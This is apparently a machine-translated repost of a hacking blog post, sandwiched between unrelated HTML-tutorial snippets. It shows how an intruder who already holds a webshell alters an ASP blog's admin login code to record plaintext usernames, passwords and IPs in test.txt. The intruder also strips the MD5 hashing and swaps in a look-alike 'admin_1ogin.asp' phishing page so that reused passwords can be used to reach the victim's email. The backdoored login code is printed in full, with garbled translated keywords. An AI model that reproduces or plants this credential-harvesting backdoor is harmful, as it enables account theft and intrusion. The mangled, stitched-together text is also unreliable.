Recomendado: colección de escritura de código HTML HTML es el lenguaje de marcado de hipertexto (hipertextMarkUpplanguage), también conocido como lenguaje web, es necesario para comprenderlo en las páginas web. Aunque ahora hay muchas herramientas para hacer páginas web, como Dreamwvear, Frontpage, etc., puede hacer hermosas páginas web sin comprender estos códigos. . . Debido a que el contenido de HTML es numero, pocas personas están dispuestas a escribir código para hacer páginas web (eficiencia), y la mayoría de ellas usan
En una verificación de seguridad, en realidad obtuve el WebShell, pero también necesito que el trabajador social tenga otra información en su dirección de correo electrónico, por lo que tengo que conocer sus hábitos.
La base de datos se descargó, pero la contraseña MD5 no se pudo descifrar. ¡Por desgracia, parece que solo necesita grabar su contraseña de cuenta de administrador de inicio de sesión!
¡Guarde la molestia de deshacerse del problema!
Esta contraseña es realmente importante pero no importante.
Porque a muchas personas les gusta usar la misma contraseña. Incluso los detectores de seguridad como yo son inevitablemente el hábito de usar la misma contraseña de cuenta.
Primero, consulte su código de inicio de sesión de fondo
<%
Inicie de sesión de DIM
Establecer login = nuevo AdLogin
Login.ExCute
Clase Adlogin
Excommcls privados
Sub class_initialize privado
Establecer commCls = nuevos CommonCLS
Excommcls.isipallow
Excommcls.checkinstall
Excommcls.getConfigCache (*)
Final
Sub class_merminate privado
Establecer excommcls = nada
Final
Sub ejecución pública
Acción oscura
Acción = solicitud (acción)
Seleccionar acción de caso
Logina de cheques de casos
Logina de verificación
Inicio de sesión de casos
Inicio de sesión
Caso
Loginf
Final seleccionar
Final
Sub checklogin privado
Dim ADNAME, ADPWD, CHECKCODE
ADNAME = excommcls.g (TRIM (request (ADNAME)))
ADPWD = MD5 (TRIM (Solicitud (ADPWD)))
Checkcode = excommcls.g (request (checkcode))
If TRIM (CHECKCODE) <> Session (ExcheckCode) y Application (Sn & IsCheckCode) = sí entonces entonces
¡El código de verificación excommcls.showmsg es incorrecto! , Aplicación (SN & Blogurl) y admin_login.asp
Salir
Final si
If TRIM (ADNAME) = CSTR (Aplicación (SN & ADNAME) y TRIM (ADPWD) = CSTR (Aplicación (SN & ADPWD) ENTONCES
Response.cookies (MD5 (SN)) (ADNAME) = ADNAME
Response.cookies (MD5 (SN)) (ADPWD) = ADPWD
sesión (adlogin) = md5 (sn)
Excommcls.getConfigCache (*)
Excommcls.getClassCache ()
Response.Redirect (Aplicación (SN & Blogurl) y Admin_index.asp)
Demás
Excommcls.showmsg cuenta o contraseña es incorrecta, la aplicación (sn & blogurl) y admin_login.asp
Final si
Final
Subriptinga privada
Response.cookies (MD5 (SN)) (ADNAME) =
Response.cookies (MD5 (SN)) (ADPWD) =
session.abandon ()
Excommcls.showmsg desconectó correctamente, aplicación (SN & Blogurl) e index.asp
Final
Sub loginf privado
%>
Mira el siguiente código
ADNAME = excommcls.g (TRIM (request (ADNAME)))
ADPWD = MD5 (TRIM (Solicitud (ADPWD)))
--- El significado es muy simple, así que no lo explico explícitamente aquí. Depende principalmente de MD5. Si la contraseña está encriptada usando MD5, la contraseña que grabamos será inútil, y todavía es MD5. entonces
Entonces pensé en un método de pesca. Su interfaz de inicio de sesión original es
Sub checklogin privado
Dim ADNAME, ADPWD, CHECKCODE, STRLOGText, IP, FF
ADNAME = excommcls.g (TRIM (request (ADNAME)))
ADPWD = (TRIM (request (ADPWD)))
Checkcode = excommcls.g (request (checkcode))
strlogfile = test.txt
IP = solicitud (IP)
StrlogText = strlogText & adname & ---- & adpwd & ----- ip: & ip & (remote_host)
Establecer F = Server.CreateObject (scripting.filesystemObject)
establecer ff = f.opentextFile (server.mapath (.) &/& strlogfile, 8, verdadero, 0)
FF.WriteLine (chr (13)+chr (10) y strlogText)
ff.clar
establecer ff = nada
establecer f = nada
If TRIM (CHECKCODE) <> Session (ExcheckCode) y Application (Sn & IsCheckCode) = sí entonces entonces
¡El código de verificación excommcls.showmsg es incorrecto! , Aplicación (SN & Blogurl) y Admin_1ogin.asp
Salir
Final si
If TRIM (ADNAME) = CSTR (Aplicación (SN & ADNAME) y TRIM (ADPWD) = CSTR (Aplicación (SN & ADPWD) ENTONCES
Response.cookies (MD5 (SN)) (ADNAME) = ADNAME
Response.cookies ((sn)) (ADPWD) = ADPWD
sesión (adlogin) = md5 (sn)
Excommcls.getConfigCache (*)
Excommcls.getClassCache ()
Response.Redirect (Aplicación (SN & Blogurl) y Admin_1ogin.asp)
Demás
Excommcls.showmsg cuenta o contraseña es incorrecta, la aplicación (sn & blogurl) y admin_1ogin.asp
Final si
Final
Ver o no,
a = La página de inicio de sesión original ahora ha sido reemplazada por una página de phishing
b = La página de inicio de sesión original (admin_login.asp) se modifica a admin_1ogin.asp
¿Por qué?
Original: ADPWD = MD5 (TRIM (Solicitud (ADPWD)))
Response.cookies (MD5 (SN)) (ADPWD) = ADPWD
Revisar
ADPWD = (TRIM (request (ADPWD)))
Response.cookies ((sn)) (ADPWD) = ADPWD
Retire MD5. . ¡Este método confuso se ha utilizado durante mucho tiempo! . .
Sin contenido técnico. ¡Por favor, no te rías de mí! La contraseña se grabará en test.txt
Compartir: Lo más destacado de los elementos de la cabeza Los documentos HTML consisten en dos partes: cabeza (parte del tema, generalmente invisible) y el cuerpo (la parte del cuerpo, visible en el navegador). Con la popularidad de los editores web visuales como FrontPage y Dreamweaver (DW), ya no es un sueño hacer una página web profesional sin comprender HTML. Sin embargo, estas herramientas de creación de la página de inicio no se pueden usar